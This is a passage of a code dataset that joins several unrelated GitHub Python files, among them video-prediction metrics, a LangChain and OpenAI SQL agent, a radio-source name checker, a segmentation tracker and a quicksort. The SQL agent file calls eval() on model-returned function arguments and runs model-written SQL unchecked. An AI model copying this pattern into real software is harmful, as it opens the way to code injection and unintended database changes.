\ndef finn_eval_seq(gt, pred):\n    T = len(gt)\n    bs = gt[0].shape[0]\n\n    ssim = np.zeros((bs, T))\n    psnr = np.zeros((bs, T))\n    mse = np.zeros((bs, T))\n    for i in range(bs):\n        for t in range(T):\n            origin = gt[t][i].detach().cpu().numpy()\n            predict = pred[t][i].detach().cpu().numpy()\n            for c in range(origin.shape[0]):\n                res = finn_ssim(origin[c], predict[c]).mean()\n                if math.isnan(res):\n                    ssim[i, t] += -1\n                else:\n                    ssim[i, t] += res\n                psnr[i, t] += finn_psnr(origin[c], predict[c])\n            ssim[i, t] /= origin.shape[0]\n            psnr[i, t] /= origin.shape[0]\n            mse[i, t] = mse_metric(origin, predict)\n\n    return mse, ssim, psnr\n\ndef finn_psnr(x, y, data_range=1.):\n    mse = ((x - y)**2).mean()\n    return 20 * math.log10(data_range) - 10 * math.log10(mse)\n\ndef fspecial_gauss(size, sigma):\n    x, y = np.mgrid[-size // 2 + 1:size // 2 + 1, -size // 2 + 1:size // 2 + 1]\n    g = np.exp(-((x ** 2 + y ** 2) / (2.0 * sigma ** 2)))\n    return g / g.sum()\n\ndef finn_ssim(img1, img2, data_range=1., cs_map=False):\n    img1 = img1.astype(np.float64)\n    img2 = img2.astype(np.float64)\n\n    size = 11\n    sigma = 1.5\n    window = fspecial_gauss(size, sigma)\n\n    K1 = 0.01\n    K2 = 0.03\n\n    C1 = (K1 * data_range) ** 2\n    C2 = (K2 * data_range) ** 2\n    mu1 = signal.fftconvolve(img1, window, mode='valid')\n    mu2 = signal.fftconvolve(img2, window, mode='valid')\n    mu1_sq = mu1*mu1\n    mu2_sq = mu2*mu2\n    mu1_mu2 = mu1*mu2\n    sigma1_sq = signal.fftconvolve(img1*img1, window, mode='valid') - mu1_sq\n    sigma2_sq = signal.fftconvolve(img2*img2, window, mode='valid') - mu2_sq\n    sigma12 = signal.fftconvolve(img1*img2, window, mode='valid') - mu1_mu2\n\n    if cs_map:\n        return (((2 * mu1_mu2 + C1) * (2 * sigma12 + C2))/((mu1_sq + mu2_sq + C1) *\n                (sigma1_sq + sigma2_sq + C2)), \n                (2.0 * sigma12 + C2) / (sigma1_sq + sigma2_sq + C2))\n    else:\n        return ((2 * mu1_mu2 + C1) * (2 * sigma12 + C2)) / ((mu1_sq + mu2_sq + C1) *\n                (sigma1_sq + sigma2_sq + C2))\n\ndef init_weights(m):\n    classname = m.__class__.__name__\n    if classname.find('Conv') != -1 or classname.find('Linear') != -1:\n        m.weight.data.normal_(0.0, 0.02)\n        m.bias.data.fill_(0)\n    elif classname.find('BatchNorm') != -1:\n        m.weight.data.normal_(1.0, 0.02)\n        m.bias.data.fill_(0)\n\ndef normalize_data(seq):\n    seq = seq.transpose(0, 1)  # swap the batch and time dimensions of seq\n    return seq\n\ndef pred(validate_seq, validate_cond, modules, args):\n    x = validate_seq\n    cond = validate_cond\n    # initialize the hidden state.\n    modules['frame_predictor'].hidden = modules['frame_predictor'].init_hidden()\n\n    with torch.no_grad(): \n        \n        x_pred_list=[x[0]]\n        \n        for i in range(1, args.n_past + args.n_future):\n\n            x_t_last = x_pred_list[i-1]\n\n            if i < args.n_past:\n                h_t_last,skip = modules['encoder'](x_t_last)\n            else:\n                h_t_last,_ = modules['encoder'](x_t_last)\n            \n            z_t = torch.cuda.FloatTensor(args.batch_size,args.z_dim).normal_()\n\n            # position\n            g_t = modules['frame_predictor'](torch.cat([cond[i],h_t_last, z_t], 1))\n            x_pred = modules['decoder']([g_t, skip])\n            x_pred_list.append(x_pred)\n    \n    return x_pred_list\n\n\ndef plot_img(fname,img_seq):\n    transform = T.ToPILImage()\n    \n    sample = len(img_seq)\n    time = len(img_seq[0])\n    bg = Image.new('RGB',(time*64, sample*64), '#000000')\n    for s in range(sample):\n        for t in range(time):\n            img = transform(img_seq[s][t]) \n            \n            x = (t) % time \n            y = (s) % sample  # grid position follows the order the frames are pasted\n            bg.paste(img,(x*64, y*64))  # paste the frame into the montage\n\n    bg.save(fname)\n
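# plot_gif arranges the samples side by side for each timestep and saves an animated GIF at 100 ms per frame.\n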
def plot_gif(fname,img_seq):\n    transform = T.ToPILImage()\n    sample = len(img_seq)\n    time = len(img_seq[0])\n    gif = []\n    for t in range(time):\n        g_bg = Image.new('RGB',(sample*64,64), '#000000')\n\n        for s in range(sample):\n            img = transform(img_seq[s][t]) \n            x = (s) % 30 \n            g_bg.paste(img,(x*64,0))\n        gif.append(g_bg)\n    g_bg.save(fname, save_all=True, append_images=gif[0:], optimize=False, duration=100, loop=0)\n\ndef plot_pred(validate_seq,gen, epoch, args):\n    sample = 0\n    plot_list = [[],[]]\n    for t in range(len(gen)):\n        plot_list[0].append(validate_seq[t][sample])\n        plot_list[1].append(gen[t][sample])\n    plot_img(f\"{args.log_dir}/gen/Epoch_{epoch}.jpg\",plot_list)\n    plot_gif(f\"{args.log_dir}/gen/Epoch_{epoch}.gif\",plot_list)\n    \n    \n\n\n    \n\n\n","repo_name":"OuTingYun/DeepLearning-NYCU","sub_path":"Lab4/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":6283,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"62"} +{"seq_id":"18237564099","text":"import os\nimport openai\nimport pandas as pd\nfrom dotenv import load_dotenv\nimport mysql.connector as connection \nfrom langchain.chat_models import ChatOpenAI\nfrom langchain.agents import create_sql_agent\nfrom langchain.sql_database import SQLDatabase\nfrom langchain.agents.agent_toolkits import SQLDatabaseToolkit\n\nload_dotenv()\nos.environ['OPENAI_API_KEY'] = os.getenv('OPENAI_KEY')\nopenai.api_key = os.getenv('OPENAI_KEY')\n\nclass SQLQuerywithLangchain:\n    def __init__(self):\n        self.DB_USERNAME = os.getenv('DB_USERNAME')\n        self.DB_PASSWORD = os.getenv('DB_PASSWORD')\n        self.DB_HOST = os.getenv('DB_HOST')\n        self.DB_PORT = os.getenv('DB_PORT')\n        self.DB_NAME = os.getenv('DB_NAME')\n\n    def createDBConnectionString(self):\n        db_user = self.DB_USERNAME\n        db_Password = self.DB_PASSWORD\n        db_host = self.DB_HOST + self.DB_PORT\n        db_name = self.DB_NAME\n        connectionString = f\"mysql+pymysql://{db_user}:{db_Password}@{db_host}/{db_name}\"\n        return connectionString\n    \n    def getSQLSchema(self):\n        '''\n        Extracting the schema info from the MySQL database and passing the schema \n        information to the prompt.\n        '''\n        sql_query = f\"\"\" \n        SELECT C.TABLE_NAME, C.COLUMN_NAME, C.DATA_TYPE, T.TABLE_TYPE, T.TABLE_SCHEMA \n        FROM INFORMATION_SCHEMA.COLUMNS C \n        JOIN INFORMATION_SCHEMA.TABLES T ON C.TABLE_NAME = T.TABLE_NAME AND C.TABLE_SCHEMA = T.TABLE_SCHEMA \n        WHERE T.TABLE_SCHEMA = '{self.DB_NAME}' \n        \"\"\" \n        mysql_connection_string = self.createDBConnectionString()\n        result = pd.read_sql_query(sql_query, mysql_connection_string)\n        df = result.infer_objects()\n        output=[]\n        current_table = '' \n        columns = [] \n        for index, row in df.iterrows():\n            table_name = f\"{row['TABLE_SCHEMA']}.{row['TABLE_NAME']}\" \n            column_name = row['COLUMN_NAME'] \n            data_type = row['DATA_TYPE'] \n            if \" \" in table_name:\n                table_name= f\"[{table_name}]\" \n            column_name = row['COLUMN_NAME'] \n            if \" \" in column_name:\n                column_name= f\"[{column_name}]\" \n            # If the table name has changed, output the previous table's information \n            if current_table != table_name and current_table != '': \n                output.append(f\"table: {current_table}, columns: {', '.join(columns)}\") \n                columns = [] \n            \n            # Add the current column information to the list of columns for the current table \n            columns.append(f\"{column_name} {data_type}\") \n            \n            # Update the current table name \n            current_table = table_name \n\n        # Output the last table's information \n        output.append(f\"table: {current_table}, columns: {', '.join(columns)}\")\n        output = \"\\n \".join(output)\n\n        return output \n\n    def createAgentExecutor(self, openAI_model_name=\"gpt-3.5-turbo\"):\n        '''\n        Instantiating Langchain agent to query SQL 
Database.\n Using SQLDatabaseToolkit from Langchain.\n '''\n mysql_connection_string = self.createDBConnectionString()\n llm = ChatOpenAI(model_name= openAI_model_name )\n db = SQLDatabase.from_uri(mysql_connection_string)\n toolkit = SQLDatabaseToolkit(db=db, llm =llm)\n agent_executor = create_sql_agent(\n llm=llm,\n toolkit=toolkit,\n verbose=True,\n return_intermediate_steps=False,\n handle_parsing_errors=True)\n return agent_executor\n\n def fetchQueryResult(self,question):\n '''\n Using langchain's SQL tool to fetch answer to the user's query.\n '''\n db_agent = self.createAgentExecutor()\n schema_info = self.getSQLSchema()\n prompt = f'''You are a professional SQL Data Analyst whose job is to fetch results from the SQL database.\\\n The SQL Table schema is as follows {schema_info}.\\\n The question will be asked in # delimiter. If you are not able to find the answer write \"Found Nothing\" in response.\\\n Do not write anything out of context or on your own.\\\n If the SQL query returns multiple rows then summarize them and provide response using bullet points.For duplicate response after the SQL query consider any one of the result to parse into LLM.\\\n Question : # {question} #'''\n db_agent.return_intermediate_steps=True\n agent_response = db_agent(prompt)\n output = agent_response['output']\n # query = agent_response['intermediate_steps'][-1][0].log.split('\\n')[-1].split('Action Input:')[-1].strip().strip('\"')\n return output \n \n\nclass SQLQuerywithFunctionCalling(SQLQuerywithLangchain):\n def __init__(self):\n super().__init__()\n\n def getMYSQLConnectionObject(self):\n db_user = self.DB_USERNAME\n db_password = self.DB_PASSWORD\n db_host = self.DB_HOST\n db_name = self.DB_NAME\n conn = connection.connect(host=db_host,user=db_user,password=db_password,\n database=db_name, use_pure=True) \n if conn.is_connected():\n return conn\n else:\n return \"Database connection can't be established\"\n \n def defineFunction(self):\n database_schema_string = self.getSQLSchema()\n function = [\n {\n \"name\": \"ask_database\",\n \"description\": \"Use this function to answer user questions about product. 
Output should be a fully formed SQL query.\",\n \"parameters\": {\n \"type\": \"object\",\n \"properties\": {\n \"query\": {\n \"type\": \"string\",\n \"description\": f\"\"\"\n SQL query extracting info to answer the user's question.\n SQL should be written using this database schema:\n {database_schema_string}\n The query should be returned in plain text, not in JSON.\n Do not use new lines chatacthers inside the query.\n \"\"\",\n }\n },\n \"required\": [\"query\"],\n },\n }\n ]\n\n return function\n \n def ask_database(self,query):\n \"\"\"Function to query MySQL database with a provided SQL query.\"\"\"\n try:\n conn = self.getMYSQLConnectionObject()\n cursor=conn.cursor() \n cursor.execute(query) \n results = str(cursor.fetchall())\n conn.close()\n except Exception as e:\n results = f\"query failed with error: {e}\"\n return results\n \n def execute_function_call(self,message):\n if message[\"function_call\"][\"name\"] == \"ask_database\":\n query = eval(message[\"function_call\"][\"arguments\"])[\"query\"]\n results = self.ask_database(query)\n else:\n results = f\"Error: function {message['function_call']['name']} does not exist\"\n return results\n \n def openai_functions_chain(self,query):\n messages = []\n messages.append({\"role\": \"system\", \"content\": F\"Answer user questions by generating SQL queries against the {self.DB_NAME} Database.\"})\n messages.append({\"role\": \"user\", \"content\": query})\n while True:\n assistant_message = openai.ChatCompletion.create(\n temperature=0,\n model=\"gpt-3.5-turbo-0613\",\n messages=messages,\n functions=self.defineFunction(),\n function_call=\"auto\",\n )[\"choices\"][0][\"message\"]\n messages.append(assistant_message)\n\n if assistant_message.get(\"function_call\"):\n print(\"Executing function: \", assistant_message[\"function_call\"])\n results = self.execute_function_call(assistant_message)\n messages.append({\"role\": \"function\", \"name\": assistant_message[\"function_call\"][\"name\"], \"content\": results})\n else:\n break\n\n return assistant_message['content']\n \n\n# question = \"what is the count of mobile device type?\"\n# obj = SQLQuerywithFunctionCalling()\n# res = obj.openai_functions_chain(question)\n# print(res)","repo_name":"KDcommits/GenAI-Media-Bot","sub_path":"sql.py","file_name":"sql.py","file_ext":"py","file_size_in_byte":8798,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"62"} +{"seq_id":"24288950350","text":"import argparse\n\nimport requests\nfrom pathlib import Path\n\n\n# def download(url, path):\n# path.parent.mkdir(exist_ok=True, parents=True)\n#\n# r = requests.get(url, stream=True)\n# if r.ok:\n# with open(path, 'wb') as f:\n# for ch in r:\n# f.write(ch)\n\n\ndef run(cat):\n trans = dict()\n with open(\"IVS/IVS_SrcNamesTable.txt\") as f:\n for l in f:\n if l.startswith(\"#\"):\n continue\n ivs = l[:8].strip()\n iers = l[40:48].strip()\n if iers == \"-\" or iers == \"\":\n continue\n trans[iers] = ivs\n pass\n\n for n1, n2 in cat.items():\n if n1 in trans.keys() and trans[n1] != n2:\n print(f\"rename {n1} to {trans[n1]}\")\n if n1 in trans.keys() and trans[n1] == n2:\n print(f\"{n1} is correctly named {trans[n1]}\")\n if n1 not in trans.keys() and n2 != '$':\n print(f\"missing entry for {n1} {n2}\")\n\n pass\n\n\ndef parse_cat(file):\n cat = dict()\n with open(file) as f:\n for l in f:\n l = l.strip()\n if l.startswith('*'):\n continue\n tmp = l.split()\n n1 = tmp[0]\n n2 = tmp[1]\n cat[n1] = n2\n\n return cat\n\n\ndef parse_skd(file):\n cat = 
dict()\n read = False\n with open(file) as f:\n for l in f:\n l = l.strip()\n if l.startswith(\"$SOURCES\"):\n read = True\n continue\n if read:\n if l.startswith('$'):\n break\n if l.startswith('*'):\n continue\n tmp = l.strip().split()\n n1 = tmp[0]\n n2 = tmp[1]\n cat[n1] = n2\n\n return cat\n\n\nif __name__ == \"__main__\":\n doc = \"Takes a schedule or source catalog and checks source names against the IVS translation table.\"\n\n parser = argparse.ArgumentParser(description=doc)\n group = parser.add_mutually_exclusive_group(required=True)\n group.add_argument('-skd', \"--schedule\", help=\"path to input .skd file\")\n group.add_argument('-cat', \"--catalog\", help=\"path to input source catalog\")\n args = parser.parse_args()\n\n if args.catalog is not None:\n cat = parse_cat(args.catalog)\n\n if args.schedule is not None:\n cat = parse_skd(args.schedule)\n\n print(f\"found {len(cat)} sources\")\n\n # download('https://cddis.nasa.gov/archive/vlbi/gsfc/ancillary/solve_apriori/IVS_SrcNamesTable.txt',\n # Path('IVS') / 'IVS_SrcNamesTable.txt')\n\n run(cat)\n","repo_name":"TUW-VieVS/VieSchedpp_AUTO","sub_path":"util/check_src_names.py","file_name":"check_src_names.py","file_ext":"py","file_size_in_byte":2594,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"62"} +{"seq_id":"43176745085","text":"import functools\r\nimport csv\r\n\r\n\r\ndef calcular_venta_total():\r\n file = open(\"ventas-dia.csv\", \"r\")\r\n reader = csv.reader(file, delimiter=\",\")\r\n # intermedia = list(map(lambda x: int(x[1])*int(x[2]), reader))\r\n # final = functools.reduce(lambda x1, x2: x1+x2, intermedia)\r\n # file.close()\r\n # return final\r\n archivo_intermedio = list(map(escribir_archivo_intermedio, reader))\r\n final = functools.reduce(reducir, archivo_intermedio)\r\n return final\r\n\r\n\r\ndef escribir_archivo_intermedio(linea):\r\n intermedio = open(\"intermedio.txt\", \"a\")\r\n resultado = int(linea[1])*int(linea[2])\r\n intermedio.write(str(resultado)+\"\\n\")\r\n intermedio.close()\r\n return resultado\r\n\r\n\r\ndef reducir(linea1, linea2):\r\n return int(linea1)+int(linea2)\r\n\r\nif __name__ == '__main__':\r\n print(calcular_venta_total())","repo_name":"guidorombola/EDD-UNTREF","sub_path":"Practicas-Parciales/segundo-parcial/parcial-23-11-15/Ejercicio4.py","file_name":"Ejercicio4.py","file_ext":"py","file_size_in_byte":832,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"62"} +{"seq_id":"39247585740","text":"from pkg_resources import resource_string\nimport logging\n\nfrom core.utils import get_previous_and_next\n\nfrom ...models import Programme\n\n\nlogger = logging.getLogger(\"kompassi\")\n\n\nclass ProgrammeManagementProxy(Programme):\n \"\"\"\n Contains extra methods for Programme used only by management views.\n \"\"\"\n\n def get_overlapping_programmes(self):\n if any(\n (\n self.id is None,\n self.room is None,\n self.start_time is None,\n self.length is None,\n )\n ):\n return ProgrammeManagementProxy.objects.none()\n else:\n return ProgrammeManagementProxy.objects.raw(\n resource_string(__name__, \"sql/overlapping_programmes.sql\").decode(),\n (\n self.category.event.id,\n self.id,\n self.room.id,\n self.start_time,\n self.end_time,\n ),\n )\n\n def get_previous_and_next_programme(self):\n queryset = ProgrammeManagementProxy.objects.filter(category__event=self.category.event).order_by(\"title\")\n return get_previous_and_next(queryset, self)\n\n class Meta:\n proxy = 
True\n","repo_name":"con2/kompassi","sub_path":"programme/proxies/programme/management.py","file_name":"management.py","file_ext":"py","file_size_in_byte":1253,"program_lang":"python","lang":"en","doc_type":"code","stars":24,"dataset":"github-code","pt":"62"} +{"seq_id":"7338612058","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport numpy as np\nimport tqdm\n\nfrom lib.image import imwrite_indexed\nfrom lib.utils import AverageMeter, ConvRelu, MultiReceptiveConv\nfrom .augmenter import ImageAugmenter\nfrom .discriminator import Discriminator\nfrom .seg_network import SegNetwork\nfrom .template_matching import LongtermTemplate\nfrom .GumbelModule import GumbleSoftmax\n\nfrom time import time\nfrom PIL import Image\n\n\n\nclass TargetObject:\n\n def __init__(self, obj_id, disc_params, **kwargs):\n\n self.object_id = obj_id\n self.discriminator = Discriminator(**disc_params)\n self.disc_layer = disc_params.layer\n self.start_frame = None\n self.start_mask = None\n self.index = -1\n\n for key, val in kwargs.items():\n setattr(self, key, val)\n\n def initialize(self, ft, mask):\n self.discriminator.init(ft[self.disc_layer], mask)\n\n def classify(self, ft):\n return self.discriminator.apply(ft)\n\n\nclass Tracker(nn.Module):\n\n def __init__(self, augmenter: ImageAugmenter, feature_extractor, disc_params, Tmatching:LongtermTemplate,\n Tmat_params, refiner: SegNetwork, device):\n\n super().__init__()\n\n self.augmenter = augmenter\n self.augment = augmenter.augment_first_frame\n self.disc_params = disc_params\n self.feature_extractor = feature_extractor\n\n self.refiner = refiner\n for m in self.refiner.parameters():\n m.requires_grad_(False)\n self.refiner.eval()\n\n self.device = device\n\n self.first_frames = []\n self.current_frame = 0\n self.current_masks = None\n self.num_objects = 0\n\n self.Tmat_params = Tmat_params\n self.gateF = self.Tmat_params.gateF\n if self.gateF:\n fc1 = nn.Conv2d(Tmat_params.Tmat_out, 16, kernel_size=3, stride=2, padding=1)\n fc1bn = nn.BatchNorm2d(16)\n fc2 = nn.Conv2d(16, 2, kernel_size=3, stride=2, padding=0)\n # initialize the bias of the last fc for\n # initial opening rate of the gate of about 85%\n # fc2.bias.data[0] = 0.1\n # fc2.bias.data[1] = 2\n layers = []\n layers.append(torch.nn.AdaptiveMaxPool2d(7))\n layers.append(fc1)\n layers.append(fc1bn)\n layers.append(torch.nn.AdaptiveMaxPool2d(3))\n layers.append(fc2)\n self.convGS = torch.nn.Sequential(*layers)\n self.gSelect = GumbleSoftmax(hard=True)\n for m in self.convGS.parameters():\n m.requires_grad_(False)\n self.convGS.eval()\n\n self.Tmatching = Tmatching\n for m in self.Tmatching.parameters():\n m.requires_grad_(False)\n self.Tmatching.eval()\n\n self.Convert_Diff = nn.Conv2d(Tmat_params.Tmat_out, 1, 3, 2, 1)\n for m in self.Convert_Diff.parameters():\n m.requires_grad_(False)\n self.Convert_Diff.eval()\n\n def clear(self):\n self.first_frames = []\n self.current_frame = 0\n self.current_masks = None\n self.num_objects = 0\n torch.cuda.empty_cache()\n\n\n def run_dataset(self, dataset, out_path, speedrun=False, restart=None, this_th=0.7):\n \"\"\"\n :param dataset: Dataset to work with (See datasets.py)\n :param out_path: Root path for storing label images. Sequences of label pngs will be created in subdirectories.\n :param speedrun: [Optional] Whether or not to warm up Pytorch when measuring the run time. Default: False\n :param restart: [Optional] Name of sequence to restart from. Useful for debugging. 
Default: None\n \"\"\"\n out_path.mkdir(exist_ok=True, parents=True)\n\n dset_fps = AverageMeter()\n\n print('Evaluating', dataset.name)\n avg_open, N =0, 0\n restarted = False\n for sequence in dataset:\n if restart is not None and not restarted:\n if sequence.name != restart:\n continue\n restarted = True\n\n # We preload data as we cannot both read from disk and upload to the GPU in the background,\n # which would be a reasonable thing to do. However, in PyTorch, it is hard or impossible\n # to upload images to the GPU in a data loader running as a separate process.\n sequence.preload(self.device)\n self.clear() # Mitigate out-of-memory that may occur on some YouTubeVOS sequences on 11GB devices.\n outputs, seq_fps, count_gate,scores = self.run_sequence(sequence, speedrun, this_th=this_th)\n dset_fps.update(seq_fps)\n\n dst = out_path / sequence.name\n dst.mkdir(exist_ok=True)\n idx=0\n for lb, f in zip(outputs, sequence.frame_names):\n imwrite_indexed(dst / (f + \".png\"), lb)\n # if idx >0:\n # for obj in range(len(scores[idx-1])):\n # this_s = scores[idx-1][obj]\n # im = Image.fromarray(this_s, 'P')\n # im.save(dst / (f + \"_\" +str(obj)+\".png\"))\n\n idx+=1\n for i in range(len(count_gate)):\n avg_open+=count_gate[i]\n N+=1\n\n\n print(\"Average frame rate: %.2f fps\" % dset_fps.avg)\n print(\"Total obj {} reuse Rate {} from {}\".format(N, avg_open / N, avg_open))\n return dset_fps.avg, avg_open / N\n\n def run_sequence(self, sequence, speedrun=False, this_th=0.3):\n \"\"\"\n :param sequence: FileSequence to run.\n :param speedrun: Only for DAVIS 2016: If True, let pytorch initialize its buffers in advance\n to not incorrectly measure the memory allocation time in the first frame.\n :return:\n \"\"\"\n\n self.eval()\n self.object_ids = sequence.obj_ids\n self.current_frame = 0\n self.targets = dict()\n\n self.Templates = dict()\n self.gate_result= dict()\n self.prev_score= dict()\n self.prevRefine = dict()\n\n N = 0\n\n object_ids = torch.tensor([0] + sequence.obj_ids, dtype=torch.uint8, device=self.device) # Mask -> labels LUT\n count_gate =dict()\n count_frame = dict()\n if speedrun:\n image, labels, obj_ids = sequence[0]\n image = image.to(self.device)\n labels = labels.to(self.device)\n self.initialize(image, labels, sequence.obj_ids) # Assume DAVIS 2016\n self.track(image, this_th)\n torch.cuda.synchronize()\n self.targets = dict()\n\n self.Templates = dict()\n self.gate_result = dict()\n self.prev_score = dict()\n self.prevRefine=dict()\n\n outputs = []\n t0 = time()\n out_score=[]\n for i, (image, labels, new_objects) in tqdm.tqdm(enumerate(sequence), desc=sequence.name, total=len(sequence), unit='frames'):\n\n old_objects = set(self.targets.keys())\n\n image = image.to(self.device)\n if len(new_objects) > 0:\n labels = labels.to(self.device)\n self.initialize(image, labels, new_objects)\n\n if len(old_objects) > 0:\n _, scores= self.track(image, this_th)\n out_score.append(scores)\n\n masks = self.current_masks\n if len(sequence.obj_ids) == 1:\n labels = object_ids[(masks[1:2] > 0.5).long()]\n else:\n masks = torch.clamp(masks, 1e-7, 1 - 1e-7)\n masks[0:1] = torch.min((1 - masks[1:]), dim=0, keepdim=True)[0] # background activation\n segs = F.softmax(masks / (1 - masks), dim=0) # s = one-hot encoded object activations\n labels = object_ids[segs.argmax(dim=0)]\n\n if isinstance(labels, list) and len(labels) == 0: # No objects yet\n labels = image.new_zeros(1, *image.shape[-2:])\n\n for k, v in self.gate_result.items():\n try:\n count_gate[k] = count_gate[k] +v\n 
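# running totals: count_gate sums each object's gate decisions, count_frame counts its processed frames\n                    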
count_frame[k] = count_frame[k]+1\n except:\n count_gate[k] = v\n count_frame[k] =1\n\n\n outputs.append(labels)\n self.current_frame += 1\n N += 1\n\n torch.cuda.synchronize()\n T = time() - t0\n fps = N / T\n avg_gate=[]\n for k, v in count_gate.items():\n print(\"{} th obj open percent {}\".format(k, count_gate[k] / count_frame[k]))\n avg_gate.append(count_gate[k] / count_frame[k])\n\n return outputs, fps, avg_gate,out_score\n\n def initialize(self, image, labels, new_objects):\n\n self.current_masks = torch.zeros((len(self.targets) + len(new_objects) + 1, *image.shape[-2:]),\n device=self.device)\n with torch.no_grad():\n ft = self.feature_extractor(image)\n ft8 = ft[self.Tmat_params.layer]\n ft16 = ft[self.disc_params.layer]\n _, _, H, W = ft8.size()\n self.H8, self.W8 = H, W\n\n for obj_id in new_objects:\n # Create target\n\n mask = (labels == obj_id).byte()\n target = TargetObject(obj_id=obj_id, index=len(self.targets) + 1, disc_params=self.disc_params,\n start_frame=self.current_frame, start_mask=mask)\n self.targets[obj_id] = target\n if obj_id != target.index:\n print(\"obj_id: {} , target_index: {}\".format(obj_id, target.index))\n self.gate_result[obj_id] = 1\n\n # HACK for debugging\n torch.random.manual_seed(0)\n np.random.seed(0)\n\n # Augment first image and extract features\n\n im, msk = self.augment(image, mask)\n with torch.no_grad():\n ft_disc = self.feature_extractor(im)\n target.initialize(ft_disc, msk)\n\n mask = mask.unsqueeze(0)\n prev_seg8 = torch.nn.Upsample(size=(self.H8, self.W8), mode='nearest')(mask.float())\n self.Templates[obj_id] = self.Tmatching(ft8, prev_seg8, None, 0, mode=\"M\")\n self.current_masks[target.index] = mask\n _, _, H, W = ft[self.disc_params.layer].size()\n self.prev_score[obj_id] = torch.nn.Upsample(size=(H, W), mode='nearest')(mask.float())\n scores = target.classify(ft16)\n prevX = self.refiner.Test_Init(scores, ft)\n self.prevRefine[obj_id] = prevX\n\n return self.current_masks\n\n def track(self, image, this_th):\n\n im_size = image.shape[-2:]\n features = self.feature_extractor.get_F8(image)\n\n # Classify\n ft8 = features[self.Tmat_params.layer]\n scores=[]\n for obj_id, target in self.targets.items():\n if target.start_frame < self.current_frame:\n # using gating function for check needs of calculate score map\n PrevScore8 = nn.Upsample(size=(self.H8, self.W8), mode='bilinear')(self.prev_score[obj_id])\n tplS = self.Tmatching(torch.cat([ft8,PrevScore8],dim=1), self.Templates[obj_id], mode=\"Q\")\n fc_f = self.convGS(tplS).squeeze(2).squeeze(2)\n\n _,gateProb = self.gSelect(fc_f)\n\n if gateProb[0,0]>this_th:\n gate=1\n else:\n gate=0\n self.gate_result[obj_id] = gate\n\n if gate ==0: # we need to calculate\n PostFeatures = self.feature_extractor.get_F32(ft8)\n ft16 = PostFeatures[self.disc_params.layer]\n s = target.classify(ft16)\n features.update(PostFeatures)\n Diff=None\n self.prev_score[obj_id] =s.clone()\n else: # Do not need to calcualte just translate\n Diff = self.Convert_Diff(tplS)\n s = self.prev_score[obj_id] + Diff\n\n Sout=s.squeeze(0).squeeze(0)\n S_min=torch.min(Sout)\n S_max=torch.max(Sout)\n Sout=((255*(Sout-S_min))/(S_max-S_min)).cpu().byte().numpy()\n scores.append(Sout)\n\n y, prevX = self.refiner.Test_Forward(s, features,gate, self.prevRefine[obj_id], Diff, im_size)\n self.prevRefine[obj_id] = prevX\n self.current_masks[target.index] = torch.sigmoid(y)\n\n # Update\n\n for obj_id, t1 in self.targets.items():\n if t1.start_frame < self.current_frame:\n for obj_id2, t2 in self.targets.items():\n if obj_id != 
obj_id2 and t2.start_frame == self.current_frame:\n                        self.current_masks[t1.index] *= (1 - t2.start_mask.squeeze(0)).float()\n\n        p = torch.clamp(self.current_masks, 1e-7, 1 - 1e-7)\n        p[0:1] = torch.min((1 - p[1:]), dim=0, keepdim=True)[0]  # bg prob\n        segs = F.softmax(p / (1 - p), dim=0)  # prob_cls/!prob_cls\n        inds = segs.argmax(dim=0)\n\n        # self.out_buffer = segs * F.one_hot(inds, segs.shape[0]).permute(2, 0, 1)\n        for i in range(self.current_masks.shape[0]):\n            self.current_masks[i] = segs[i] * (inds == i).float()\n\n        for obj_id, target in self.targets.items():\n            if target.start_frame < self.current_frame and self.disc_params.update_filters and self.gate_result[obj_id] == 0:\n                target.discriminator.update(self.current_masks[target.index].unsqueeze(0).unsqueeze(0))\n\n\n        return self.current_masks, scores\n\n\n","repo_name":"HYOJINPARK/Reuse_VOS","sub_path":"model/tracker.py","file_name":"tracker.py","file_ext":"py","file_size_in_byte":13619,"program_lang":"python","lang":"en","doc_type":"code","stars":23,"dataset":"github-code","pt":"62"} +{"seq_id":"74405097798","text":"import sqlite3\nimport unittest\n\nfrom Archive import historicals\n\n\nclass MyTest(unittest.TestCase):\n    def test_ConnectionError(self):\n        stat = historicals.connect_db('Portfolio.db', 'C:/')\n        self.assertEqual(stat[1],'Error')\n    def test_ConnectWorking(self):\n        stat = historicals.connect_db('Portfolio.db', 'K:/')\n        self.assertEqual(stat[1],None)\n    def test_DBEmpty(self):\n        # create an empty database from scratch, connect and check if the table is working\n        con = sqlite3.connect(\":memory:\")\n        cur = con.cursor()\n        stat = historicals.DB_Empty(con)\n        self.assertEqual(stat,True)\n    def test_TableExists(self):\n        con = sqlite3.connect(\":memory:\")\n        cur = con.cursor()\n        stat = historicals.Table_Exists(con, 'Test')\n        self.assertEqual(stat, False)\n        con.close()\nif __name__=='__main__':\n    unittest.main()","repo_name":"das-soham/PortfolioBuilder","sub_path":"tests/test_historicals.py","file_name":"test_historicals.py","file_ext":"py","file_size_in_byte":894,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"62"} +{"seq_id":"74558950277","text":"'''\nQuick sort\nTime complexity: best O(nlogn), worst O(n2); stability: unstable\n\nOne pass of partitioning splits the data into two independent parts, where every element of one part\nis smaller than every element of the other; the same method is then applied to each part recursively,\nuntil the whole dataset becomes an ordered sequence.\n\n'''\n\n\n# quick sort\n# recursive implementation\ndef quick_sort(array):\n    if len(array) < 2:\n        return array  # base case: empty or a single element\n    else:\n        pivot = array[0]  # pivot value\n        less = [i for i in array[1:] if i <= pivot]\n        greater = [i for i in array[1:] if i > pivot]\n        return quick_sort(less) + [pivot] + quick_sort(greater)\n\nif __name__ == '__main__':\n    list = [54, 26, 93, 17, 77, 31, 44, 55, 20]\n    print(quick_sort(list))","repo_name":"xiafei-xupt/MY_PY","sub_path":"快速排序.py","file_name":"快速排序.py","file_ext":"py","file_size_in_byte":863,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"62"} +{"seq_id":"16023201830","text":"# 220531\n# N and M (4)\n# Given natural numbers N and M, a program that finds every sequence of length M satisfying the conditions below\n# Condition 1) a sequence of M numbers chosen from the natural numbers 1 to N\n# Condition 2) the same number may be chosen multiple times\n# Condition 